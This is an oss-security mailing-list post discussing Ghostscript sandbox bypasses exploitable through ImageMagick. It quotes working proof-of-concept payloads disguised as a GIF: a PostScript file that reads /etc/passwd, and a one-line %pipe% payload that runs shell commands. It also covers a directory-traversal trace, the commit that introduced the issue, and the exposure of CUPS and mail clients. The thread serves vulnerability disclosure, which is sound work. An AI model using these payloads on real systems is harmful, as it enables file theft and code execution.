Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Fri, 30 Sep 2016 23:11:07 +0200
From: Florian Weimer <fw@...eb.enyo.de>
To: Tavis Ormandy <taviso@...gle.com>
Cc: oss-security@...ts.openwall.com
Subject: Re: ImageMagick identify "d:" hangs

* Tavis Ormandy:

> On Thu, Sep 29, 2016 at 2:28 PM, Tavis Ormandy <taviso@...gle.com> wrote:
>>
>> Just for future reference, here is an example of dumping a file to an
>> image processed with ImageMagick that works with gs 9.20:
>>
>> $ cat test.gif
>> %!PS
>> /Size 20 def                             % font/line size
>> /Line 0 def                              % current line
>> /Buf 1024 string def                     % line buffer
>> /Path 0 newpath def
>>
>> /Courier-Bold findfont Size scalefont setfont
>> 1 1 1 setrgbcolor clippath fill          % draw white background
>> 0 0 0 setrgbcolor                        % set black foreground
>>
>> (/etc/passwd) .libfile {
>>     {
>>         dup Buf readline
>>         {
>>             Path Line moveto show
>>         }{
>>             showpage
>>             quit
>>         } ifelse
>>         % next line
>>         /Line Line Size add def
>>     } loop
>> } if
>> $ convert test.gif png:test.png
>
> The more I look, the worse it gets. This also works in 9.18 and
> higher, arbitrary shell command execution:
>
> $ cat test.gif
> currentdevice null true mark /OutputICCProfile (%pipe%id > /dev/tty)
> .putdeviceparams
> quit
> $ convert test.gif png:test.png
>
> (Note: I don't know why it doesn't work on earlier versions, maybe
> it's possible to make it work, or some other param will work)

It still tries to open a file in earlier versions, with directory
traversal:

[pid 29607] open("/usr/share/ghostscript/9.06/iccprofiles/../../../../../etc/passwd", O_RDONLY) = 5

The %pipe%-based execution was introduced as a side effect of:

commit 1fae53a708fca6c2ac0417bc23f5d095cc379250
Author: Chris Liddell <chris.liddell@...ifex.com>
Date:   Thu Jul 30 17:27:23 2015 +0100

    Bug 696101: fix uses of the sfopen API.
    
    The stream API in GS is defined as *always* opening files in
    binary mode, where applicable, so there is no need for the API
    clients to specify binary mode.
    
    This is previously been benign, and thus ignored, but reportedly
    ending up with a duplicate 'b' character in the mode causes a
    crash on Windows 10.
    
    No cluster differences.


It was not visible before because 'b' in the mode argument to popen
causes glibc's popen to fail.  This is highly non-portable.  Earlier
versions on different libcs are likely have to code execution, too.

> I think -dSAFER is too dangerous to use without sandboxing right now,
> things like evince and imagemagick that use it as a backend should
> disable by default.

Note that this RCE-ish for things like CUPS and with mail clients
which use mailcap entries which map file extensions to some
Imagemagick tool (which ignore the file extension and fingerprint the
input as a Postscript file to be handed off to Ghostscript).

I reported your new vulnerability here:

  http://bugs.ghostscript.com/show_bug.cgi?id=697178

It's been a long time I looked at Ghostscript, but if I recall
correctly, it's implemented in part in Postscript, which probably
explains why there are super-privileged Postscript primitives which
break the sandbox.

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ